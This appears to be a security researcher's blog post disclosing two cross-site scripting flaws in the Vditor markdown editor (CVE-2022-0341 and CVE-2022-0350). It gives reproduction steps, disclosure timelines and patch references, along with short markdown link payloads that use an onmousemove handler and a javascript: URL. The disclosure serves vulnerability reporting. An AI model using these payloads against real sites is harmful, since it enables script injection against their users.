<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="Jeongwon Jo" />
  <meta name="description" content="" />
  
  
  <title>
    
      Vditor, Cross-Site Scripting via markdown syntax 
      
      
      |
    
     Jeongwon Jo
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.0.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Pocas</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="https://pocas.kr">
          <a target="_blank" rel="noopener" href="https://pocas.kr">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">Vditor, Cross-Site Scripting via markdown syntax</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2022-04-02 12:34:45
        </span>
        
      </div>
      <div class="markdown-body">
        <h3 id="Summary"><a href="#Summary" class="headerlink" title="Summary"></a>Summary</h3><blockquote>
<p>The vanessa219&#x2F;vditor is a markdown editor supported by browsers. There were two vulnerabilities.</p>
</blockquote>
<p>First vulnerability, When a user creates a link using the markdown syntax, the server does not URL-encode the double-quotes, so the user can escape the href attribute and trigger XSS using the on* attribute. Second vulnerability, If the user passes javascript:alert(document.domain) as the URL value when creating a link using the markdown syntax, there is no sanitizing process and the link is created as it is. Both vulnerabilities were patched in v3.8.13 version, and occur in v3.8.12 v3.8.11.<br><br></p>
<ul>
<li><a href="#CVE-2022-0341">CVE-2022-0341</a><ul>
<li><a href="#Proof-of-Concept-0341">Proof of Concept</a></li>
<li><a href="#Reporting-Timeline-0341">Reporting Timeline</a></li>
<li><a href="#Reference-0341">Reference</a></li>
</ul>
</li>
<li><a href="#CVE-2022-0350">CVE-2022-0350</a><ul>
<li><a href="#Proof-of-Concept-0350">Proof of Concept</a></li>
<li><a href="#Reporting-Timeline-0350">Reporting Timeline</a></li>
<li><a href="#Reference-0350">Reference</a></li>
</ul>
</li>
</ul>
<hr>
<h3 id="CVE-2022-0341"><a href="#CVE-2022-0341" class="headerlink" title="CVE-2022-0341"></a>CVE-2022-0341</h3><h4 id="Proof-of-Concept-0341"><a href="#Proof-of-Concept-0341" class="headerlink" title="Proof of Concept (0341)"></a>Proof of Concept (0341)</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">XSS PoC : [xss](https://google.com/&quot;//onmousemove=&quot;alert(document.domain))</span><br><span class="line">&gt; I can insert an onerror. But I can&#x27;t log in without a Chinese phone number, so I can&#x27;t test</span><br><span class="line"></span><br><span class="line">1. Open the vanessa219/vditor</span><br><span class="line">2. Enter the XSS PoC (Strangely, it doesn&#x27;t insert at once, so I have to try inserting several times)</span><br><span class="line">3. When the user hovers the mouse over the link, XSS is triggered via a mouse event.</span><br><span class="line"></span><br><span class="line">Video : https://www.youtube.com/watch?v=pKQMbrezdCs</span><br></pre></td></tr></table></figure>

<hr>
<h4 id="Reporting-Timeline-0341"><a href="#Reporting-Timeline-0341" class="headerlink" title="Reporting Timeline (0341)"></a>Reporting Timeline (0341)</h4><ul>
<li>2022-01-23 12h 24m : Reported this issue via the <a target="_blank" rel="noopener" href="https://www.huntr.dev/">huntr</a></li>
<li>2022-01-24 13h 06m : Validated this issue by vanessa219</li>
<li>2022-01-24 13h 06m : Assigned a CVE-2022-0341</li>
<li>2022-03-14 10h 56m : Patched this issue by vanessa219</li>
</ul>
<hr>
<h4 id="Reference-0341"><a href="#Reference-0341" class="headerlink" title="Reference (0341)"></a>Reference (0341)</h4><ul>
<li><a target="_blank" rel="noopener" href="https://www.github.com/vanessa219/vditor/commit/219f8a9e272aba3cbc0096a82cac776532dbb9e5">Github Commit</a></li>
<li><a target="_blank" rel="noopener" href="https://www.huntr.dev/bounties/fa546b57-bc15-4705-824e-9474b616f628/">Huntr</a></li>
<li><a target="_blank" rel="noopener" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0341">Mitre</a></li>
<li><a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2022-0341">NVD</a></li>
<li><a target="_blank" rel="noopener" href="https://security.snyk.io/vuln/SNYK-JS-VDITOR-2422324">Snyk</a></li>
</ul>
<hr>
<h3 id="CVE-2022-0350"><a href="#CVE-2022-0350" class="headerlink" title="CVE-2022-0350"></a>CVE-2022-0350</h3><h4 id="Proof-of-Concept-0350"><a href="#Proof-of-Concept-0350" class="headerlink" title="Proof of Concept (0350)"></a>Proof of Concept (0350)</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">XSS PoC : [xss](javascript:alert(document.domain))</span><br><span class="line"></span><br><span class="line">1. Open the vanessa219/vditor</span><br><span class="line">2. Enter the XSS PoC</span><br><span class="line">3. Click the Link</span><br><span class="line"></span><br><span class="line">Video : https://www.youtube.com/watch?v=5zzdiBivNSs</span><br></pre></td></tr></table></figure>

<hr>
<h4 id="Reporting-Timeline-0350"><a href="#Reporting-Timeline-0350" class="headerlink" title="Reporting Timeline (0350)"></a>Reporting Timeline (0350)</h4><ul>
<li>2022-01-24 13h 11m : Reported this issue via the <a target="_blank" rel="noopener" href="https://www.huntr.dev/">huntr</a></li>
<li>2022-01-25 00h 11m : Validated this issue by vanessa219&#x2F;vditor</li>
<li>2022-01-25 00h 11m : Assigned a CVE-2022-0350</li>
<li>2022-03-31 22h 57m : Patched this issue by vanessa219</li>
</ul>
<hr>
<h4 id="Reference-0350"><a href="#Reference-0350" class="headerlink" title="Reference (0350)"></a>Reference (0350)</h4><ul>
<li><a target="_blank" rel="noopener" href="https://www.github.com/vanessa219/vditor/commit/e912e36ea98251d700499b1ac7702708d3398476">Github Commit</a></li>
<li><a target="_blank" rel="noopener" href="https://www.huntr.dev/bounties/8202aa06-4b49-45ff-aa0f-00982f62005c/">Huntr</a></li>
<li><a target="_blank" rel="noopener" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0350">Mitre</a></li>
<li><a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2022-0350">NVD</a></li>
<li><a target="_blank" rel="noopener" href="https://security.snyk.io/vuln/SNYK-JS-VDITOR-2438403">Snyk</a></li>
</ul>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2022/03/27/2022-03-27-Line-CTF/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2022-04-02 12:34:45
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2022/05/16/2022-05-15-IDOR-DR/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Summary"><span class="toc-text">Summary</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2022-0341"><span class="toc-text">CVE-2022-0341</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Concept-0341"><span class="toc-text">Proof of Concept (0341)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Reporting-Timeline-0341"><span class="toc-text">Reporting Timeline (0341)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Reference-0341"><span class="toc-text">Reference (0341)</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2022-0350"><span class="toc-text">CVE-2022-0350</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Proof-of-Concept-0350"><span class="toc-text">Proof of Concept (0350)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Reporting-Timeline-0350"><span class="toc-text">Reporting Timeline (0350)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Reference-0350"><span class="toc-text">Reference (0350)</span></a></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/P0cas">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        Copyright © 2023 Pocas
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + Vditor%2C%20Cross-Site%20Scripting%20via%20markdown%20syntax + '&url=' + https%3A%2F%2Fblog.pocas.kr%2F2022%2F04%2F02%2F2022-04-02-xss-vditor%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://blog.pocas.kr/2022/04/02/2022-04-02-xss-vditor/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
